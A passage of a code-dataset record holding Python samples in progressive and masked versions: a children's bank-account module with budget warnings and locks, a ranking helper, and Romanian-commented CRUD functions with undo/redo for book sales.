budget: Budget) ->None:\n \"\"\"\n Prints a list of transactions in the given budget for review.\n :param budget: a Budget\n :return: None\n \"\"\"\n print(\n f'Please review the following transactions in the {budget.name} budget:'\n )\n transactions = self.get_transactions_by_budget(budget.category)\n for transaction in transactions:\n print(transaction)\n\n def _warn_nearing_exceed_budget(self, budget: Budget, exceeded_percent: int\n ) ->None:\n \"\"\"\n Issues a warning to the user that they are about to exceed this\n budget.\n :param budget: a Budget, the budget that they are about to\n exceed\n :param exceeded_percent: an int, the percent that they have\n already exceeded\n :return: None\n \"\"\"\n print(\n f'[WARNING] You are about to exceed the {budget.name} budget! You went over {exceeded_percent}% of the total ${budget.total_amount}.'\n )\n\n def _notify_exceeded_budget(self, budget: Budget) ->None:\n \"\"\"\n Notifies the user that they've just exceeded this budget.\n :param budget: a Budget, the budget that they've just exceeded\n :return: None\n \"\"\"\n print(f'[NOTIFICATION] You have exceeded the {budget.name} budget.')\n\n def _lock_budget(self, budget: Budget) ->None:\n \"\"\"\n Locks a budget.\n :param budget: a Budget, the budget to be locked\n :return: None\n \"\"\"\n budget.lock()\n print(f'Your {budget.name} budget has now been locked!')\n\n def get_transactions_by_budget(self, category: BudgetCategory) ->list:\n \"\"\"\n Returns a list of transactions for the given budget category.\n :param category: a BudgetCategory\n :return: a list of Transaction, the transactions in that\n category\n \"\"\"\n return [transaction for transaction in self.transactions if \n transaction.budget_category == category]\n\n def get_budgets(self) ->list:\n \"\"\"\n Returns a list of budgets.\n :return: a list of Budget objects\n \"\"\"\n return self.budget_manager.get_budgets()\n\n def __str__(self):\n transactions_info = ''\n for transaction in self.transactions:\n transactions_info += f'{transaction}\\n'\n if len(transactions_info) == 0:\n transactions_info = \"You haven't made any transaction yet.\\n\"\n return f\"\"\"*** Bank Account Details ***\n• Bank account number: {self.bank_account_no}\n• Bank name: {self.bank_name}\n• Status: {'Locked' if self._locked else 'Available'}\n• Transactions:\n{transactions_info}• Closing balance: ${self.bank_balance}\"\"\"\n\n\nclass AngelBankAccount(BankAccount):\n \"\"\"\n This bank account is designed for Angel users. The Angel user\n represents a user who's parents are not worried at all.\n \"\"\"\n\n def _warn_and_lock_if_needed(self, transaction: Transaction) ->None:\n \"\"\"\n Issues a warning or locks budget/bank account when these\n conditions are met:\n - Never gets locked out of a budget category. They can continue\n spending money even if they exceed the budget in question.\n - Gets politely notified if they exceed a budget category.\n - Gets a warning if they exceed more than 90% of a budget.\n :param transaction: a Transaction, the newly recorded\n transaction\n :return: None\n \"\"\"\n budget = self.budget_manager.get_budget(transaction.budget_category)\n exceeded_ratio = budget.exceeded_ratio\n if exceeded_ratio > 1:\n self._notify_exceeded_budget(budget)\n self.print_transactions_for_review(budget)\n elif exceeded_ratio > 0.9:\n self._warn_nearing_exceed_budget(budget, 90)\n self.print_transactions_for_review(budget)\n\n\nclass TroublemakerBankAccount(BankAccount):\n \"\"\"\n This bank account is designed for Troublemaker children. These\n children often find themselves in trouble. These are usually minor\n incidents and their parents are concerned but not worried.\n \"\"\"\n\n def _warn_and_lock_if_needed(self, transaction: Transaction) ->None:\n \"\"\"\n Issues a warning or locks budget/bank account when these\n conditions are met:\n - Gets a warning if they exceed more than 75% of a budget\n category.\n - Gets politely notified if they exceed a budget category.\n - Gets locked out of conducting transactions in a budget\n category if they exceed it by 120% of the amount assigned to the\n budget in question.\n :param transaction: a Transaction, the newly recorded\n transaction\n :return: None\n \"\"\"\n budget = self.budget_manager.get_budget(transaction.budget_category)\n exceeded_ratio = budget.exceeded_ratio\n if exceeded_ratio > 1.2:\n self._lock_budget(budget)\n self.print_transactions_for_review(budget)\n elif exceeded_ratio > 1:\n self._notify_exceeded_budget(budget)\n self.print_transactions_for_review(budget)\n elif exceeded_ratio > 0.75:\n self._warn_nearing_exceed_budget(budget, 75)\n self.print_transactions_for_review(budget)\n\n\nclass RebelBankAccount(BankAccount):\n \"\"\"\n This bank account is designed for Rebel children. The Rebel\n represents a child who refuses to follow any rules and believes that\n society should be broken down and restructured. Parents of these\n children are quite worried about them.\n \"\"\"\n\n def _warn_and_lock_if_needed(self, transaction: Transaction) ->None:\n \"\"\"\n Issues a warning or locks budget/bank account when these\n conditions are met:\n - They get a warning for every transaction after exceeding 50%\n of a budget.\n - Gets ruthlessly notified if they exceed a budget category.\n - Gets locked out of conducting transactions in a budget\n category if they exceed it by 100% of the amount assigned to the\n budget in question.\n - If they exceed their budget in 2 or more categories then they\n get locked out of their account completely.\n :param transaction: a Transaction, the newly recorded\n transaction\n :return: None\n \"\"\"\n budget = self.budget_manager.get_budget(transaction.budget_category)\n exceeded_ratio = budget.exceeded_ratio\n if exceeded_ratio > 1:\n self._notify_exceeded_budget(budget)\n self._lock_budget(budget)\n self.print_transactions_for_review(budget)\n if self.budget_manager.no_locked_budgets >= 2:\n self._locked = True\n print('YOUR BANK ACCOUNT HAS BEEN LOCKED!')\n elif exceeded_ratio > 0.5:\n self._warn_nearing_exceed_budget(budget, 50)\n self.print_transactions_for_review(budget)\n\n\nclass BankAccountCreator:\n \"\"\"\n An utility class that helps create a BankAccount.\n \"\"\"\n _user_type_mapper = {UserType.ANGEL: AngelBankAccount, UserType.\n TROUBLEMAKER: TroublemakerBankAccount, UserType.REBEL: RebelBankAccount\n }\n \"\"\"\n A dictionary that maps a UserType enum to an appropriate BankAccount\n class. \n \"\"\"\n\n @staticmethod\n def load_test_account() ->BankAccount:\n \"\"\"\n Creates and returns a test bank account.\n :return: a BankAccount\n \"\"\"\n budget_manager = BudgetCreator.load_test_budget_manager()\n return TroublemakerBankAccount('123123', 'HSBC', 1000, budget_manager)\n\n @classmethod\n def create_bank_account(cls, user_type: UserType) ->BankAccount:\n \"\"\"\n Prompts the user for bank account details, initializes a Bank\n Account based on the given user type and returns it.\n :param user_type: a UserType\n :return: a BankAccount\n \"\"\"\n bank_account_no = input('Enter bank account number: ')\n bank_name = input('Enter bank name: ')\n bank_balance = -1\n while bank_balance < 0:\n bank_balance = float(input('Enter bank balance: '))\n if bank_balance < 0:\n print(\n 'Bank balance must be greater than or equal to 0! Please enter again!'\n )\n budget_manager = BudgetCreator.create_budget_manager()\n return cls._user_type_mapper[user_type](bank_account_no, bank_name,\n bank_balance, budget_manager)\n",
"step-5": "\"\"\"\nThis module contains the class definitions for all types of BankAccount\nalongside BankAccountCreator as a supporting class to create an\nappropriate bank account for a given user type.\n\"\"\"\n\nfrom abc import ABC\nfrom abc import abstractmethod\nfrom transaction import Transaction\nfrom budget import Budget\nfrom budget import BudgetManager\nfrom budget import BudgetCategory\nfrom budget import BudgetCreator\nfrom user import UserType\n\n\nclass BankAccount(ABC):\n \"\"\"\n An abstract base class that represents a bank account. By default,\n all bank accounts have:\n - a bank account number\n - a bank name\n - a bank balance\n - a budget manager to manage budgets\n - a list of transactions\n - a locked state to determine whether this account is locked.\n \"\"\"\n\n def __init__(self, bank_account_no: str, bank_name: str,\n bank_balance: float, budget_manager: BudgetManager):\n \"\"\"\n Initializes a bank account.\n :param bank_account_no: a string\n :param bank_name: a string\n :param bank_balance: a float\n :param budget_manager: a BudgetManager\n \"\"\"\n self.bank_account_no = bank_account_no\n self.bank_name = bank_name\n self.bank_balance = bank_balance\n self.transactions = []\n self.budget_manager = budget_manager\n self._locked = False\n\n def record_transaction(self, transaction: Transaction) -> bool:\n \"\"\"\n Records a transaction and returns True if this transaction is\n recorded successfully. A transaction is recorded successfully\n when this bank account is not locked, has enough balance, and\n the budget associated with the transaction is not locked.\n :param transaction: a Transaction, the transaction to record\n :return: a bool, True if record successfully, False otherwise\n \"\"\"\n if self._locked:\n print('Failed to record transaction! Your account has been locked!'\n )\n return False\n\n if transaction.amount > self.bank_balance:\n print('Failed to record transaction! Not enough balance!')\n return False\n\n budget = self.budget_manager.get_budget(transaction.budget_category)\n if budget.locked:\n print('Failed to record transaction! This budget has been locked!')\n return False\n\n self.transactions.append(transaction)\n self.bank_balance -= transaction.amount\n budget.amount_spent += transaction.amount\n self._warn_and_lock_if_needed(transaction)\n return True\n\n @abstractmethod\n def _warn_and_lock_if_needed(self, transaction: Transaction) -> None:\n \"\"\"\n Contains the logic to check if a warning or notification should\n be issued to the user. It also locks a budget or this bank\n account if needed. The exact algorithm would vary bank account\n to bank account.\n :param transaction: a Transaction, the newly recorded\n transaction\n :return: None\n \"\"\"\n pass\n\n def print_transactions_for_review(self, budget: Budget) -> None:\n \"\"\"\n Prints a list of transactions in the given budget for review.\n :param budget: a Budget\n :return: None\n \"\"\"\n print(f'Please review the following transactions in the {budget.name} '\n f'budget:')\n transactions = self.get_transactions_by_budget(budget.category)\n for transaction in transactions:\n print(transaction)\n\n def _warn_nearing_exceed_budget(self, budget: Budget,\n exceeded_percent: int) -> None:\n \"\"\"\n Issues a warning to the user that they are about to exceed this\n budget.\n :param budget: a Budget, the budget that they are about to\n exceed\n :param exceeded_percent: an int, the percent that they have\n already exceeded\n :return: None\n \"\"\"\n print(f'[WARNING] You are about to exceed the {budget.name} budget! '\n f'You went over {exceeded_percent}% of the total '\n f'${budget.total_amount}.')\n\n def _notify_exceeded_budget(self, budget: Budget) -> None:\n \"\"\"\n Notifies the user that they've just exceeded this budget.\n :param budget: a Budget, the budget that they've just exceeded\n :return: None\n \"\"\"\n print(f'[NOTIFICATION] You have exceeded the {budget.name} budget.')\n\n def _lock_budget(self, budget: Budget) -> None:\n \"\"\"\n Locks a budget.\n :param budget: a Budget, the budget to be locked\n :return: None\n \"\"\"\n budget.lock()\n print(f'Your {budget.name} budget has now been locked!')\n\n def get_transactions_by_budget(self, category: BudgetCategory) -> list:\n \"\"\"\n Returns a list of transactions for the given budget category.\n :param category: a BudgetCategory\n :return: a list of Transaction, the transactions in that\n category\n \"\"\"\n return [transaction\n for transaction in self.transactions\n if transaction.budget_category == category]\n\n def get_budgets(self) -> list:\n \"\"\"\n Returns a list of budgets.\n :return: a list of Budget objects\n \"\"\"\n return self.budget_manager.get_budgets()\n\n def __str__(self):\n transactions_info = ''\n for transaction in self.transactions:\n transactions_info += f'{transaction}\\n'\n if len(transactions_info) == 0:\n transactions_info = \"You haven't made any transaction yet.\\n\"\n return f'*** Bank Account Details ***\\n' \\\n f'• Bank account number: {self.bank_account_no}\\n' \\\n f'• Bank name: {self.bank_name}\\n' \\\n f'• Status: {\"Locked\" if self._locked else \"Available\"}\\n' \\\n f'• Transactions:\\n' \\\n f'{transactions_info}' \\\n f'• Closing balance: ${self.bank_balance}'\n\n\nclass AngelBankAccount(BankAccount):\n \"\"\"\n This bank account is designed for Angel users. The Angel user\n represents a user who's parents are not worried at all.\n \"\"\"\n\n def _warn_and_lock_if_needed(self, transaction: Transaction) -> None:\n \"\"\"\n Issues a warning or locks budget/bank account when these\n conditions are met:\n - Never gets locked out of a budget category. They can continue\n spending money even if they exceed the budget in question.\n - Gets politely notified if they exceed a budget category.\n - Gets a warning if they exceed more than 90% of a budget.\n :param transaction: a Transaction, the newly recorded\n transaction\n :return: None\n \"\"\"\n budget = self.budget_manager.get_budget(transaction.budget_category)\n exceeded_ratio = budget.exceeded_ratio\n if exceeded_ratio > 1:\n self._notify_exceeded_budget(budget)\n self.print_transactions_for_review(budget)\n elif exceeded_ratio > 0.9:\n self._warn_nearing_exceed_budget(budget, 90)\n self.print_transactions_for_review(budget)\n\n\nclass TroublemakerBankAccount(BankAccount):\n \"\"\"\n This bank account is designed for Troublemaker children. These\n children often find themselves in trouble. These are usually minor\n incidents and their parents are concerned but not worried.\n \"\"\"\n\n def _warn_and_lock_if_needed(self, transaction: Transaction) -> None:\n \"\"\"\n Issues a warning or locks budget/bank account when these\n conditions are met:\n - Gets a warning if they exceed more than 75% of a budget\n category.\n - Gets politely notified if they exceed a budget category.\n - Gets locked out of conducting transactions in a budget\n category if they exceed it by 120% of the amount assigned to the\n budget in question.\n :param transaction: a Transaction, the newly recorded\n transaction\n :return: None\n \"\"\"\n budget = self.budget_manager.get_budget(transaction.budget_category)\n exceeded_ratio = budget.exceeded_ratio\n if exceeded_ratio > 1.2:\n self._lock_budget(budget)\n self.print_transactions_for_review(budget)\n elif exceeded_ratio > 1:\n self._notify_exceeded_budget(budget)\n self.print_transactions_for_review(budget)\n elif exceeded_ratio > 0.75:\n self._warn_nearing_exceed_budget(budget, 75)\n self.print_transactions_for_review(budget)\n\n\nclass RebelBankAccount(BankAccount):\n \"\"\"\n This bank account is designed for Rebel children. The Rebel\n represents a child who refuses to follow any rules and believes that\n society should be broken down and restructured. Parents of these\n children are quite worried about them.\n \"\"\"\n\n def _warn_and_lock_if_needed(self, transaction: Transaction) -> None:\n \"\"\"\n Issues a warning or locks budget/bank account when these\n conditions are met:\n - They get a warning for every transaction after exceeding 50%\n of a budget.\n - Gets ruthlessly notified if they exceed a budget category.\n - Gets locked out of conducting transactions in a budget\n category if they exceed it by 100% of the amount assigned to the\n budget in question.\n - If they exceed their budget in 2 or more categories then they\n get locked out of their account completely.\n :param transaction: a Transaction, the newly recorded\n transaction\n :return: None\n \"\"\"\n budget = self.budget_manager.get_budget(transaction.budget_category)\n exceeded_ratio = budget.exceeded_ratio\n if exceeded_ratio > 1:\n self._notify_exceeded_budget(budget)\n self._lock_budget(budget)\n self.print_transactions_for_review(budget)\n if self.budget_manager.no_locked_budgets >= 2:\n self._locked = True\n print('YOUR BANK ACCOUNT HAS BEEN LOCKED!')\n elif exceeded_ratio > 0.5:\n self._warn_nearing_exceed_budget(budget, 50)\n self.print_transactions_for_review(budget)\n\n\nclass BankAccountCreator:\n \"\"\"\n An utility class that helps create a BankAccount.\n \"\"\"\n\n _user_type_mapper = {\n UserType.ANGEL: AngelBankAccount,\n UserType.TROUBLEMAKER: TroublemakerBankAccount,\n UserType.REBEL: RebelBankAccount,\n }\n \"\"\"\n A dictionary that maps a UserType enum to an appropriate BankAccount\n class. \n \"\"\"\n\n @staticmethod\n def load_test_account() -> BankAccount:\n \"\"\"\n Creates and returns a test bank account.\n :return: a BankAccount\n \"\"\"\n budget_manager = BudgetCreator.load_test_budget_manager()\n return TroublemakerBankAccount('123123', 'HSBC', 1000, budget_manager)\n\n @classmethod\n def create_bank_account(cls, user_type: UserType) -> BankAccount:\n \"\"\"\n Prompts the user for bank account details, initializes a Bank\n Account based on the given user type and returns it.\n :param user_type: a UserType\n :return: a BankAccount\n \"\"\"\n bank_account_no = input('Enter bank account number: ')\n bank_name = input('Enter bank name: ')\n bank_balance = -1\n while bank_balance < 0:\n bank_balance = float(input('Enter bank balance: '))\n if bank_balance < 0:\n print('Bank balance must be greater than or equal to 0! Please'\n ' enter again!')\n budget_manager = BudgetCreator.create_budget_manager()\n return cls._user_type_mapper[user_type](\n bank_account_no,\n bank_name,\n bank_balance,\n budget_manager,\n )\n",
"step-ids": [
12,
17,
20,
25,
28
]
}
|
[
12,
17,
20,
25,
28
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def range(state):
ran = state['tmp']['analysis']['range']
rang = {key: [state['rank'][i] for i in val & ran] for key, val in
state['tmp']['analysis']['keys'].items() if val & ran}
for item in state['tmp']['items']:
item.setdefault('rank', 0)
item_keys = set(item.keys())
rang_keys = set(rang.keys())
keys = item_keys & rang_keys
for key in keys:
val = item[key]
ruls = rang[key]
for rule in ruls:
item['rank'] += _rank(val, rule)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def range(state):
ran = state['tmp']['analysis']['range']
rang = {key: [state['rank'][i] for i in val & ran] for key, val in
state['tmp']['analysis']['keys'].items() if val & ran}
for item in state['tmp']['items']:
item.setdefault('rank', 0)
item_keys = set(item.keys())
rang_keys = set(rang.keys())
keys = item_keys & rang_keys
for key in keys:
val = item[key]
ruls = rang[key]
for rule in ruls:
item['rank'] += _rank(val, rule)
def _rank(val, rule):
if 'rank' not in rule or 'val' not in rule:
return 0
if isinstance(val, dict):
return sum([_rank(val, rule) for val in val.values()])
if isinstance(val, collections.Iterable):
return sum([_rank(val, rule) for val in val])
if 'from' in rule['val'] and 'to' in rule['val']:
return rule['rank'] if rule['val']['from'] < val < rule['val']['to'
] else 0
if 'from' in rule['val']:
return rule['rank'] if rule['val']['from'] < val else 0
if 'to' in rule['val']:
return rule['rank'] if val < rule['val']['to'] else 0
return 0
<|reserved_special_token_1|>
import collections
def range(state):
ran = state['tmp']['analysis']['range']
rang = {key: [state['rank'][i] for i in val & ran] for key, val in
state['tmp']['analysis']['keys'].items() if val & ran}
for item in state['tmp']['items']:
item.setdefault('rank', 0)
item_keys = set(item.keys())
rang_keys = set(rang.keys())
keys = item_keys & rang_keys
for key in keys:
val = item[key]
ruls = rang[key]
for rule in ruls:
item['rank'] += _rank(val, rule)
def _rank(val, rule):
if 'rank' not in rule or 'val' not in rule:
return 0
if isinstance(val, dict):
return sum([_rank(val, rule) for val in val.values()])
if isinstance(val, collections.Iterable):
return sum([_rank(val, rule) for val in val])
if 'from' in rule['val'] and 'to' in rule['val']:
return rule['rank'] if rule['val']['from'] < val < rule['val']['to'
] else 0
if 'from' in rule['val']:
return rule['rank'] if rule['val']['from'] < val else 0
if 'to' in rule['val']:
return rule['rank'] if val < rule['val']['to'] else 0
return 0
<|reserved_special_token_1|>
import collections
def range(state):
ran = state["tmp"]["analysis"]["range"]
rang = {
key : [ state["rank"][i] for i in val & ran ]
for key, val in state["tmp"]["analysis"]["keys"].items()
if val & ran
}
for item in state["tmp"]["items"]:
item.setdefault("rank", 0)
item_keys = set(item.keys())
rang_keys = set(rang.keys())
keys = item_keys & rang_keys
for key in keys:
val = item[key]
ruls = rang[key]
for rule in ruls:
item["rank"] += _rank(val, rule)
def _rank(val, rule):
if "rank" not in rule or "val" not in rule:
return 0
if isinstance(val, dict):
return sum([ _rank(val, rule) for val in val.values() ])
if isinstance(val, collections.Iterable):
return sum([ _rank(val, rule) for val in val ])
if "from" in rule["val"] and "to" in rule["val"]:
return rule["rank"] if rule["val"]["from"] < val < rule["val"]["to"] else 0
if "from" in rule["val"]:
return rule["rank"] if rule["val"]["from"] < val else 0
if "to" in rule["val"]:
return rule["rank"] if val < rule["val"]["to"] else 0
return 0
|
flexible
|
{
"blob_id": "51868f26599c5878f8eb976d928c30d0bf61547d",
"index": 9701,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef range(state):\n ran = state['tmp']['analysis']['range']\n rang = {key: [state['rank'][i] for i in val & ran] for key, val in\n state['tmp']['analysis']['keys'].items() if val & ran}\n for item in state['tmp']['items']:\n item.setdefault('rank', 0)\n item_keys = set(item.keys())\n rang_keys = set(rang.keys())\n keys = item_keys & rang_keys\n for key in keys:\n val = item[key]\n ruls = rang[key]\n for rule in ruls:\n item['rank'] += _rank(val, rule)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef range(state):\n ran = state['tmp']['analysis']['range']\n rang = {key: [state['rank'][i] for i in val & ran] for key, val in\n state['tmp']['analysis']['keys'].items() if val & ran}\n for item in state['tmp']['items']:\n item.setdefault('rank', 0)\n item_keys = set(item.keys())\n rang_keys = set(rang.keys())\n keys = item_keys & rang_keys\n for key in keys:\n val = item[key]\n ruls = rang[key]\n for rule in ruls:\n item['rank'] += _rank(val, rule)\n\n\ndef _rank(val, rule):\n if 'rank' not in rule or 'val' not in rule:\n return 0\n if isinstance(val, dict):\n return sum([_rank(val, rule) for val in val.values()])\n if isinstance(val, collections.Iterable):\n return sum([_rank(val, rule) for val in val])\n if 'from' in rule['val'] and 'to' in rule['val']:\n return rule['rank'] if rule['val']['from'] < val < rule['val']['to'\n ] else 0\n if 'from' in rule['val']:\n return rule['rank'] if rule['val']['from'] < val else 0\n if 'to' in rule['val']:\n return rule['rank'] if val < rule['val']['to'] else 0\n return 0\n",
"step-4": "import collections\n\n\ndef range(state):\n ran = state['tmp']['analysis']['range']\n rang = {key: [state['rank'][i] for i in val & ran] for key, val in\n state['tmp']['analysis']['keys'].items() if val & ran}\n for item in state['tmp']['items']:\n item.setdefault('rank', 0)\n item_keys = set(item.keys())\n rang_keys = set(rang.keys())\n keys = item_keys & rang_keys\n for key in keys:\n val = item[key]\n ruls = rang[key]\n for rule in ruls:\n item['rank'] += _rank(val, rule)\n\n\ndef _rank(val, rule):\n if 'rank' not in rule or 'val' not in rule:\n return 0\n if isinstance(val, dict):\n return sum([_rank(val, rule) for val in val.values()])\n if isinstance(val, collections.Iterable):\n return sum([_rank(val, rule) for val in val])\n if 'from' in rule['val'] and 'to' in rule['val']:\n return rule['rank'] if rule['val']['from'] < val < rule['val']['to'\n ] else 0\n if 'from' in rule['val']:\n return rule['rank'] if rule['val']['from'] < val else 0\n if 'to' in rule['val']:\n return rule['rank'] if val < rule['val']['to'] else 0\n return 0\n",
"step-5": "import collections\n\ndef range(state):\n\tran = state[\"tmp\"][\"analysis\"][\"range\"]\n\n\trang = {\n\t\tkey : [ state[\"rank\"][i] for i in val & ran ]\n\t\tfor key, val in state[\"tmp\"][\"analysis\"][\"keys\"].items()\n\t\tif val & ran\n\t}\n\n\tfor item in state[\"tmp\"][\"items\"]:\n\t\titem.setdefault(\"rank\", 0)\n\n\t\titem_keys = set(item.keys())\n\t\trang_keys = set(rang.keys())\n\t\tkeys = item_keys & rang_keys\n\n\t\tfor key in keys:\n\t\t\tval = item[key]\n\t\t\truls = rang[key]\n\n\t\t\tfor rule in ruls:\n\t\t\t\titem[\"rank\"] += _rank(val, rule)\n\ndef _rank(val, rule):\n\tif \"rank\" not in rule or \"val\" not in rule:\n\t\treturn 0\n\n\tif isinstance(val, dict):\n\t\treturn sum([ _rank(val, rule) for val in val.values() ])\n\n\tif isinstance(val, collections.Iterable):\n\t\treturn sum([ _rank(val, rule) for val in val ])\n\n\tif \"from\" in rule[\"val\"] and \"to\" in rule[\"val\"]:\n\t\treturn rule[\"rank\"] if rule[\"val\"][\"from\"] < val < rule[\"val\"][\"to\"] else 0\n\n\tif \"from\" in rule[\"val\"]:\n\t\treturn rule[\"rank\"] if rule[\"val\"][\"from\"] < val else 0\n\n\tif \"to\" in rule[\"val\"]:\n\t\treturn rule[\"rank\"] if val < rule[\"val\"][\"to\"] else 0\n\n\treturn 0\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
def get_by_id(id, lista):
"""
ia vanzarea cu id-ul dat dintr-o lista
:param id: id-ul vanzarii - string
:param lista: lista de vanzari
:return: vanzarea cu id-ul dat sau None daca nu exista in lista
"""
for vanzare in lista:
if get_id(vanzare) == id:
return vanzare
return None
def create(lst_vanzari, id_vanzare: int, titlu, gen, pret, tip_reducere,
undo_list: list, redo_list: list):
"""
Creeaza o vanzare
:param lst_vanzari:lista de vanzari
:param id_vanzare: id-ul vanzarii
:param titlu: titlul cartii din vanzare
:param gen: genul cartii din vanzare
:param pret: pretul vanzarii
:param tip_reducere: tipul de reducere
:param undo_list: lista de sters
:param redo_list: lista de adaugat
:return: returneaza o vanzare cu un id unic si detaliile ei
"""
new_list = ['None', 'Gold', 'Silver']
if tip_reducere not in new_list:
raise TypeError('Tip reducere necunoscut.')
if get_by_id(id_vanzare, lst_vanzari) is not None:
raise ValueError(f'Exista deja o vanzare cu acest id {id_vanzare}.')
vanzare_obiecte = vanzare_obiect(id_vanzare, titlu, gen, pret, tip_reducere
)
undo_list.append(lst_vanzari)
redo_list.clear()
return lst_vanzari + [vanzare_obiecte]
def read(lst_vanzari, id_carte: int=None):
"""
Citeste o vanzare din "baza de date".
:param lst_vanzari: lista de vanzari
:param id_vanzare: id-ul vanzarii.
:return: cartea cu id-ul id_carte sau lista cu toate vanzarile, daca id_carte=None
"""
cartea_cu_id = None
for cartea in lst_vanzari:
if get_id(cartea) == id_carte:
cartea_cu_id = cartea
if cartea_cu_id:
return cartea_cu_id
return None
<|reserved_special_token_0|>
def delete(lst_vanzare, id_carte: int, undo_list: list, redo_list: list):
"""
:param lst_vanzare: lista de vanzari
:param id_carte: id-ul cartii din vanzare
:param undo_list: lista cu vanzarea care trebuie stearsa
:param redo_list: lista cu vanzarea care trebuie adaugata
:return: o lista de vanzari fara cartea cu id-ul id_carte.
"""
if read(lst_vanzare, id_carte) is None:
raise ValueError(
f'Nu xista o carte cu id-ul {id_carte} pe care sa o stergem.')
new_vanzari = []
for carte in lst_vanzare:
if get_id(carte) != id_carte:
new_vanzari.append(carte)
undo_list.append(lst_vanzare)
redo_list.clear()
return new_vanzari
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def inverse_create(lst_vanzari, id_carte):
new_vanzari = []
for carte in lst_vanzari:
if get_id(carte) != id_carte:
new_vanzari.append(carte)
return new_vanzari
def get_by_id(id, lista):
"""
ia vanzarea cu id-ul dat dintr-o lista
:param id: id-ul vanzarii - string
:param lista: lista de vanzari
:return: vanzarea cu id-ul dat sau None daca nu exista in lista
"""
for vanzare in lista:
if get_id(vanzare) == id:
return vanzare
return None
def create(lst_vanzari, id_vanzare: int, titlu, gen, pret, tip_reducere,
undo_list: list, redo_list: list):
"""
Creeaza o vanzare
:param lst_vanzari:lista de vanzari
:param id_vanzare: id-ul vanzarii
:param titlu: titlul cartii din vanzare
:param gen: genul cartii din vanzare
:param pret: pretul vanzarii
:param tip_reducere: tipul de reducere
:param undo_list: lista de sters
:param redo_list: lista de adaugat
:return: returneaza o vanzare cu un id unic si detaliile ei
"""
new_list = ['None', 'Gold', 'Silver']
if tip_reducere not in new_list:
raise TypeError('Tip reducere necunoscut.')
if get_by_id(id_vanzare, lst_vanzari) is not None:
raise ValueError(f'Exista deja o vanzare cu acest id {id_vanzare}.')
vanzare_obiecte = vanzare_obiect(id_vanzare, titlu, gen, pret, tip_reducere
)
undo_list.append(lst_vanzari)
redo_list.clear()
return lst_vanzari + [vanzare_obiecte]
def read(lst_vanzari, id_carte: int=None):
"""
Citeste o vanzare din "baza de date".
:param lst_vanzari: lista de vanzari
:param id_vanzare: id-ul vanzarii.
:return: cartea cu id-ul id_carte sau lista cu toate vanzarile, daca id_carte=None
"""
cartea_cu_id = None
for cartea in lst_vanzari:
if get_id(cartea) == id_carte:
cartea_cu_id = cartea
if cartea_cu_id:
return cartea_cu_id
return None
<|reserved_special_token_0|>
def delete(lst_vanzare, id_carte: int, undo_list: list, redo_list: list):
"""
:param lst_vanzare: lista de vanzari
:param id_carte: id-ul cartii din vanzare
:param undo_list: lista cu vanzarea care trebuie stearsa
:param redo_list: lista cu vanzarea care trebuie adaugata
:return: o lista de vanzari fara cartea cu id-ul id_carte.
"""
if read(lst_vanzare, id_carte) is None:
raise ValueError(
f'Nu xista o carte cu id-ul {id_carte} pe care sa o stergem.')
new_vanzari = []
for carte in lst_vanzare:
if get_id(carte) != id_carte:
new_vanzari.append(carte)
undo_list.append(lst_vanzare)
redo_list.clear()
return new_vanzari
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def inverse_create(lst_vanzari, id_carte):
new_vanzari = []
for carte in lst_vanzari:
if get_id(carte) != id_carte:
new_vanzari.append(carte)
return new_vanzari
def get_by_id(id, lista):
"""
ia vanzarea cu id-ul dat dintr-o lista
:param id: id-ul vanzarii - string
:param lista: lista de vanzari
:return: vanzarea cu id-ul dat sau None daca nu exista in lista
"""
for vanzare in lista:
if get_id(vanzare) == id:
return vanzare
return None
def create(lst_vanzari, id_vanzare: int, titlu, gen, pret, tip_reducere,
undo_list: list, redo_list: list):
"""
Creeaza o vanzare
:param lst_vanzari:lista de vanzari
:param id_vanzare: id-ul vanzarii
:param titlu: titlul cartii din vanzare
:param gen: genul cartii din vanzare
:param pret: pretul vanzarii
:param tip_reducere: tipul de reducere
:param undo_list: lista de sters
:param redo_list: lista de adaugat
:return: returneaza o vanzare cu un id unic si detaliile ei
"""
new_list = ['None', 'Gold', 'Silver']
if tip_reducere not in new_list:
raise TypeError('Tip reducere necunoscut.')
if get_by_id(id_vanzare, lst_vanzari) is not None:
raise ValueError(f'Exista deja o vanzare cu acest id {id_vanzare}.')
vanzare_obiecte = vanzare_obiect(id_vanzare, titlu, gen, pret, tip_reducere
)
undo_list.append(lst_vanzari)
redo_list.clear()
return lst_vanzari + [vanzare_obiecte]
def read(lst_vanzari, id_carte: int=None):
"""
Citeste o vanzare din "baza de date".
:param lst_vanzari: lista de vanzari
:param id_vanzare: id-ul vanzarii.
:return: cartea cu id-ul id_carte sau lista cu toate vanzarile, daca id_carte=None
"""
cartea_cu_id = None
for cartea in lst_vanzari:
if get_id(cartea) == id_carte:
cartea_cu_id = cartea
if cartea_cu_id:
return cartea_cu_id
return None
def update(lst_vanzari, new_vanzare, undo_list: list, redo_list: list):
"""
Actualizeaza o vanzare.
:param lst_vanzari: lista de vaznari
:param new_vanzare: vanzarea care se va actualiza - id-ul trebuie sa fie unul existent.
:param undo_list: lista cu vanzarea care tebuie stearsa
:param redo_list: lista cu vanzarea care trebuie adaugata
:return: o lista cu vanzari actualizata
"""
if read(lst_vanzari, get_id(new_vanzare)) is None:
raise ValueError(
f'Nu xista o vanzare cu id-ul {get_id(new_vanzare)} pe care sa o actualizam.'
)
new_vanzari = []
for vanzare in lst_vanzari:
if get_id(vanzare) != get_id(new_vanzare):
new_vanzari.append(vanzare)
else:
new_vanzari.append(new_vanzare)
undo_list.append(lst_vanzari)
redo_list.clear()
return new_vanzari
def delete(lst_vanzare, id_carte: int, undo_list: list, redo_list: list):
"""
:param lst_vanzare: lista de vanzari
:param id_carte: id-ul cartii din vanzare
:param undo_list: lista cu vanzarea care trebuie stearsa
:param redo_list: lista cu vanzarea care trebuie adaugata
:return: o lista de vanzari fara cartea cu id-ul id_carte.
"""
if read(lst_vanzare, id_carte) is None:
raise ValueError(
f'Nu xista o carte cu id-ul {id_carte} pe care sa o stergem.')
new_vanzari = []
for carte in lst_vanzare:
if get_id(carte) != id_carte:
new_vanzari.append(carte)
